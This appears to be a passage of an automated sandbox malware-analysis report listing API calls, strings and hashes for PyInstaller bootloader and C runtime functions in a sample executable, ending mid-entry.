Opcode ID: 93215b2962e715be9f5aa91d99be70836a612e16585fb8aee950a2577366c4a3
Instruction ID: 4ed783029dd7ea2ce57dd61b455ff135eebcb04979613a4d8545e26ce0ab2d17
Opcode Fuzzy Hash: 93215b2962e715be9f5aa91d99be70836a612e16585fb8aee950a2577366c4a3
Instruction Fuzzy Hash: BD216D71B1AB8685EB50EF16E8400B9F6A1FB84BD0BB44536DA4D43798EF3CE545C320

Function 00007FF78F4875A0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 136COMMON

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF78F487716

Part of subcall function 00007FF78F490250: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F490264

Part of subcall function 00007FF78F490224: _invalid_parameter_noinfo.LIBCMT ref: 00007FF78F490238

Strings

ERROR: file already exists but should not: %s, xrefs: 00007FF78F48767C
WARNING: file already exists but should not: %s, xrefs: 00007FF78F487698
%s%c%s, xrefs: 00007FF78F4875E5
\, xrefs: 00007FF78F4875EC
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF78F487632

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _invalid_parameter_noinfo$_fread_nolock
String ID: %s%c%s$ERROR: file already exists but should not: %s$PYINSTALLER_STRICT_UNPACK_MODE$WARNING: file already exists but should not: %s$\
API String ID: 3231891352-3501660386
Opcode ID: 716029066da9aa7fdbb7f0bfe734846ac928b4b9348b4955f396da70c2eca7e6
Instruction ID: e094a0fb4bac1cb1323928a89225ac8367b7a4453dd704625556eb36b5f80b56
Opcode Fuzzy Hash: 716029066da9aa7fdbb7f0bfe734846ac928b4b9348b4955f396da70c2eca7e6
Instruction Fuzzy Hash: 0C513A30B2D6C341FA11B76999606F9A2917F85B90FF40132ED0D877D7EE2CE501C260

Function 00007FF78F48DDB8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF78F48E06A,?,?,?,00007FF78F48DD5C,?,?,00000001,00007FF78F48D979), ref: 00007FF78F48DE3D
GetLastError.KERNEL32(?,?,?,00007FF78F48E06A,?,?,?,00007FF78F48DD5C,?,?,00000001,00007FF78F48D979), ref: 00007FF78F48DE4B
LoadLibraryExW.KERNEL32(?,?,?,00007FF78F48E06A,?,?,?,00007FF78F48DD5C,?,?,00000001,00007FF78F48D979), ref: 00007FF78F48DE75
FreeLibrary.KERNEL32(?,?,?,00007FF78F48E06A,?,?,?,00007FF78F48DD5C,?,?,00000001,00007FF78F48D979), ref: 00007FF78F48DEBB
GetProcAddress.KERNEL32(?,?,?,00007FF78F48E06A,?,?,?,00007FF78F48DD5C,?,?,00000001,00007FF78F48D979), ref: 00007FF78F48DEC7

Strings

api-ms-, xrefs: 00007FF78F48DE5D

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
Instruction ID: 5e724005d5cd45da2ef7b9ee2b9ff2134517a6301e2a462d818629f4ee8e6697
Opcode Fuzzy Hash: fa40dd5a34ae4d0b6736a9b6b46f8404287a490a05e4db78c585315ae40f634e
Instruction Fuzzy Hash: B731B431A2BA8291EE52BB06A8005F9A3E4FF58BA4FB90536DD1D47754DF3DE444C320

Function 00007FF78F487420 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF78F488AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF78F482ABB), ref: 00007FF78F488B1A

ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF78F4879A1,00000000,?,00000000,00000000,?,00007FF78F48154F), ref: 00007FF78F48747F

Part of subcall function 00007FF78F482B30: MessageBoxW.USER32 ref: 00007FF78F482C05

Strings

LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF78F487456
LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF78F4874DA
LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF78F487493

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
API String ID: 1662231829-3498232454
Opcode ID: 5e8575f0beacdb372a81e9debe9bb6d766e8e255e7029f60019f70bf69282784
Instruction ID: 962e9c82aabb6e3b90710f03ad0be53cd89ea4d8477e1baaf3c780657c44bf44
Opcode Fuzzy Hash: 5e8575f0beacdb372a81e9debe9bb6d766e8e255e7029f60019f70bf69282784
Instruction Fuzzy Hash: 99313371B2D6C241FA24BB2595652FA9291BF98780FF44437DA4E43B96EE2CE504C620

Function 00007FF78F488AE0 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF78F482ABB), ref: 00007FF78F488B1A

Part of subcall function 00007FF78F4829E0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF78F4887F2,?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F482A14
Part of subcall function 00007FF78F4829E0: MessageBoxW.USER32 ref: 00007FF78F482AF0

MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF78F482ABB), ref: 00007FF78F488BA0

Strings

win32_utils_from_utf8, xrefs: 00007FF78F488B69
MultiByteToWideChar, xrefs: 00007FF78F488B2E, 00007FF78F488BB1
Out of memory., xrefs: 00007FF78F488B62
Failed to decode wchar_t from UTF-8, xrefs: 00007FF78F488BAA
Failed to get wchar_t buffer size., xrefs: 00007FF78F488B27

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLastMessage
String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
API String ID: 3723044601-876015163
Opcode ID: 2a7f0904e5ec1897560545d2159a663e9c273eaf1fea03a0d1ae7df506dc6c73
Instruction ID: 1ca6161b1e9d468c2ac9a21083eb46d3ccc3a28af30f50d90fbbb28f6e78137a
Opcode Fuzzy Hash: 2a7f0904e5ec1897560545d2159a663e9c273eaf1fea03a0d1ae7df506dc6c73
Instruction Fuzzy Hash: DE215376B19A8281EB50EB16F8410AAE3A1FFC47D4FA84132DB5C53BA9EF2DD541C710

Function 00007FF78F49B710 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF78F49B71F
FlsGetValue.KERNEL32 ref: 00007FF78F49B734
FlsSetValue.KERNEL32 ref: 00007FF78F49B755
FlsSetValue.KERNEL32 ref: 00007FF78F49B782
FlsSetValue.KERNEL32 ref: 00007FF78F49B793
FlsSetValue.KERNEL32 ref: 00007FF78F49B7A4
SetLastError.KERNEL32 ref: 00007FF78F49B7BF

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 4c036152db15b5a2576d662e79388d683b1cca67e39eb64d5f9cdec899b2deef
Instruction ID: 1b52ee8f29b61f363674035c641065ac61e555ca4360d5ed9001ec2880819c8c
Opcode Fuzzy Hash: 4c036152db15b5a2576d662e79388d683b1cca67e39eb64d5f9cdec899b2deef
Instruction Fuzzy Hash: 0F219A34B082C285FA1477A156459F9E242BF847B0FB04736D93E07AFBDE2CA805C620

Function 00007FF78F4A85BC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF78F4A85ED
GetLastError.KERNEL32 ref: 00007FF78F4A85F9
CloseHandle.KERNEL32 ref: 00007FF78F4A8611
CreateFileW.KERNEL32 ref: 00007FF78F4A863C
WriteConsoleW.KERNEL32 ref: 00007FF78F4A865B

Strings

CONOUT$, xrefs: 00007FF78F4A861D

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
Instruction ID: efb0eda83e88125a6ec357e2ea1427410e7a4fb2ec585acf2daabc2bc2d3a606
Opcode Fuzzy Hash: 47774de373198f8681994077b4026dd9a590ed4534763da2009e0dd4878e84a9
Instruction Fuzzy Hash: 8B118131A18A8186F750AB82F854369B6A0FB88BE4FA44236DA1E877A4CF3CD444C750

Function 00007FF78F49B888 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF78F4954CD,?,?,?,?,00007FF78F49F1BF,?,?,00000000,00007FF78F49B9A6,?,?,?), ref: 00007FF78F49B897
FlsSetValue.KERNEL32(?,?,?,00007FF78F4954CD,?,?,?,?,00007FF78F49F1BF,?,?,00000000,00007FF78F49B9A6,?,?,?), ref: 00007FF78F49B8CD
FlsSetValue.KERNEL32(?,?,?,00007FF78F4954CD,?,?,?,?,00007FF78F49F1BF,?,?,00000000,00007FF78F49B9A6,?,?,?), ref: 00007FF78F49B8FA
FlsSetValue.KERNEL32(?,?,?,00007FF78F4954CD,?,?,?,?,00007FF78F49F1BF,?,?,00000000,00007FF78F49B9A6,?,?,?), ref: 00007FF78F49B90B
FlsSetValue.KERNEL32(?,?,?,00007FF78F4954CD,?,?,?,?,00007FF78F49F1BF,?,?,00000000,00007FF78F49B9A6,?,?,?), ref: 00007FF78F49B91C
SetLastError.KERNEL32(?,?,?,00007FF78F4954CD,?,?,?,?,00007FF78F49F1BF,?,?,00000000,00007FF78F49B9A6,?,?,?), ref: 00007FF78F49B937

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 8f76d250fbe0b5259abb4dbde422c74cf40887be6a771761d1db9f63c6a56687
Instruction ID: 1cb88a8f2f8b36700793fa5e021d4ac1fdb438384ba4d13ddae5c033ff1a0812
Opcode Fuzzy Hash: 8f76d250fbe0b5259abb4dbde422c74cf40887be6a771761d1db9f63c6a56687
Instruction Fuzzy Hash: 53116F30B0D6C241F614B77155459F9E251BF887B0FF40736D82E476E7DE2CA505C620

Function 00007FF78F48D778 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF78F48D7A3
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF78F48D838
RtlUnwindEx.KERNEL32 ref: 00007FF78F48D887

Strings

f, xrefs: 00007FF78F48D7B6
csm, xrefs: 00007FF78F48D81E

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
Instruction ID: 032cc04b7c975764d3db1731ad5f94eb7beb8ba6e2d51af6ef6e7e096b6f9384
Opcode Fuzzy Hash: c8f7f253a213423ff5db8842e39d1181b4fa0cc0edf0f0e27fe70a45a9ca17df
Instruction Fuzzy Hash: 8A51D832B2A6C28AD714EF11E404AA9B7B5FB44B94FA18132DD5E47B48DF3AE940C710

Function 00007FF78F482600 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00007FF78F4827EF), ref: 00007FF78F482638
DialogBoxIndirectParamW.USER32 ref: 00007FF78F4826FC
DeleteObject.GDI32 ref: 00007FF78F48272F
DestroyIcon.USER32 ref: 00007FF78F482741

Strings

Unhandled exception in script, xrefs: 00007FF78F482668

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: ef2f79dabe8b940bf64869f24e404b0ac86445532df2e67e8084f44f9f65f5c2
Instruction ID: 00e50198541b412914627654b9295259a4161d3e48d09620de290d25ff84654a
Opcode Fuzzy Hash: ef2f79dabe8b940bf64869f24e404b0ac86445532df2e67e8084f44f9f65f5c2
Instruction Fuzzy Hash: E2317032B19AC289EB20EF65E8556F9A360FF89784FA00136EA4D47B69DF3CD105C710

Function 00007FF78F4829E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00000000,00000000,00007FF78F4887F2,?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F482A14

Part of subcall function 00007FF78F488560: GetLastError.KERNEL32(00000000,00007FF78F482A5E,?,?,?,?,?,?,?,?,?,?,?,00007FF78F48101D), ref: 00007FF78F488587
Part of subcall function 00007FF78F488560: FormatMessageW.KERNEL32 ref: 00007FF78F4885B6

Part of subcall function 00007FF78F488AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF78F482ABB), ref: 00007FF78F488B1A

MessageBoxW.USER32 ref: 00007FF78F482AF0
MessageBoxA.USER32 ref: 00007FF78F482B0C

Strings

Fatal error detected, xrefs: 00007FF78F482AC6, 00007FF78F482AFE
%s%s: %s, xrefs: 00007FF78F482A6B

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Message$ErrorLast$ByteCharFormatMultiWide
String ID: %s%s: %s$Fatal error detected
API String ID: 2806210788-2410924014
Opcode ID: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
Instruction ID: 657d95479d343ba20dc1a0f35c0520c5c87ad896af4ef830303cd76c41c1af63
Opcode Fuzzy Hash: c01ac0bbfceecfac493be67ae1d6a2211250b6a817a0c50f994bc812b65e1c92
Instruction Fuzzy Hash: 82314F72639AC691E630AB11E4516EAA364FF84784FA04037EA8D03A99DF3CD709CB50

Function 00007FF78F49A018 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF78F49A03D
GetProcAddress.KERNEL32 ref: 00007FF78F49A053
FreeLibrary.KERNEL32 ref: 00007FF78F49A07A

Strings

CorExitProcess, xrefs: 00007FF78F49A04C
mscoree.dll, xrefs: 00007FF78F49A034

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
Instruction ID: 736de69fd870ab644eda438d15b713b2c72ae041566eb8e4d5f7f78f528dbdc1
Opcode Fuzzy Hash: bbe3d75c1d18d9b252fc65a249d413b32bc9fbcf71b4c61f8ce4d80949566840
Instruction Fuzzy Hash: B7F04471B0A74241EA106B55E8447B59760FF89761FE40236C56D471F4CF6DD589C360

Function 00007FF78F4A9C40 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF78F4A9C68
_set_statfp.LIBCMT ref: 00007FF78F4A9C83
_set_statfp.LIBCMT ref: 00007FF78F4A9C9F
_set_statfp.LIBCMT ref: 00007FF78F4A9CDB

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
Instruction ID: 3c51a5c3b6fe93715db59a6913d3505970383f09dec1a38a0d2d227e6c3c7775
Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
Instruction Fuzzy Hash: 74119172E1EE8341F654352BE4423F994E17F553B0EF80636E96E077DACE6CA844C220

Function 00007FF78F49B950 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF78F49AB67,?,?,00000000,00007FF78F49AE02,?,?,?,?,?,00007FF78F4930CC), ref: 00007FF78F49B96F
FlsSetValue.KERNEL32(?,?,?,00007FF78F49AB67,?,?,00000000,00007FF78F49AE02,?,?,?,?,?,00007FF78F4930CC), ref: 00007FF78F49B98E
FlsSetValue.KERNEL32(?,?,?,00007FF78F49AB67,?,?,00000000,00007FF78F49AE02,?,?,?,?,?,00007FF78F4930CC), ref: 00007FF78F49B9B6
FlsSetValue.KERNEL32(?,?,?,00007FF78F49AB67,?,?,00000000,00007FF78F49AE02,?,?,?,?,?,00007FF78F4930CC), ref: 00007FF78F49B9C7
FlsSetValue.KERNEL32(?,?,?,00007FF78F49AB67,?,?,00000000,00007FF78F49AE02,?,?,?,?,?,00007FF78F4930CC), ref: 00007FF78F49B9D8

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 9e1f5f4a1b3245dc74612c863be46776bcdac4bc40e164520dccced427665cd5
Instruction ID: b49d392781b8cb9ec418b1e098eafe4f6a402e3e713adda06ad729dc7db20c20
Opcode Fuzzy Hash: 9e1f5f4a1b3245dc74612c863be46776bcdac4bc40e164520dccced427665cd5
Instruction Fuzzy Hash: 13117230B082C241FA547BA69551AF9E241BF443B0FB44336E87E477E7DE2CE941C620

Function 00007FF78F49B7E4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF78F49B7F5
FlsSetValue.KERNEL32 ref: 00007FF78F49B814
FlsSetValue.KERNEL32 ref: 00007FF78F49B83C
FlsSetValue.KERNEL32 ref: 00007FF78F49B84D
FlsSetValue.KERNEL32 ref: 00007FF78F49B85E

Memory Dump Source

Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true

Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 0e11ebfcfedaf50d903662c6f8872d2c6bdf32a6161de3e830a41dec96b80c12
Instruction ID: be7ada936706112e853fbf52559ad68d4ec2a66c3f611fcf30d3d1106a1f816d
Opcode Fuzzy Hash: 0e11ebfcfedaf50d903662c6f8872d2c6bdf32a6161de3e830a41dec96b80c12
Instruction Fuzzy Hash: 3A110A30F0928746FA58B6B158519F9A141BF88770FB40736D93D4B2E3DD2CB905C631

Function 00007FF78F4964B4 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4964F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F49661A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF78F4966D0

Strings

verbose, xrefs: 00007FF78F4964C4

Memory Dump Source

